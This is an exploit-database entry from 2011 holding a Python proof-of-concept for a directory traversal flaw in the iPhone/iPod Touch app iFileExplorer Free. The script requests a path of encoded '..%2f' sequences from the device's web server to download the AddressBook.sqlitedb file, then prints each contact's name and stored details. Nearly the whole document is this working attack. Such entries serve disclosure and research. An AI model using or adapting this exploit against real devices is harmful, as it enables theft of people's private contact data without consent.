iPod Touch/iPhone iFileExplorer Free Directory Traversal

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : iPod Touch/iPhone iFileExplorer Free Directory Traversal
# Published : 2011-03-04
# Author : theSmallNothin
# Previous Title : Edraw Office Viewer Component V7.4 ActiveX Stack Buffer Overflow
# Next Title : Comtrend ADSL Router CT-5367 C01_R12 Remote Root

# Exploit Title: iPod Touch/iPhone iFileExplorer Free Directory Traversal
# Date: 04/03/2011 #UK date format
# Author: theSmallNothing
# Software Link: http://itunes.apple.com/gb/app/ifileexplorer-protect-multi/id355253462?mt=8
# Version: 2.8
# Tested on: iPod Touch 2G (4.1)

import urllib, sqlite3

base = "http://192.168.0.3/" #Change to iDevice ip
url = base + "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb" #Jailbroken Address

try:
    urllib.urlretrieve(url,"addressbook.sqlite")
    print "Grabbed Address Bookn"
except:
    print "Could not grab address book..."

conn = sqlite3.connect("addressbook.sqlite")
cursor = conn.cursor()
cmd = "SELECT * FROM ABPerson"
cursor.execute(cmd)
results = cursor.fetchall()
for person in results:
    if person[1] == None:
        continue
    print person[1], person[2]
    
    cmd = "SELECT * FROM ABMultiValue WHERE record_id="+str(person[0])
    cursor.execute(cmd)
    vunDataArr = cursor.fetchall()
    for vunData in vunDataArr:
        if vunData[5] != None:
            print "t"+vunData[5]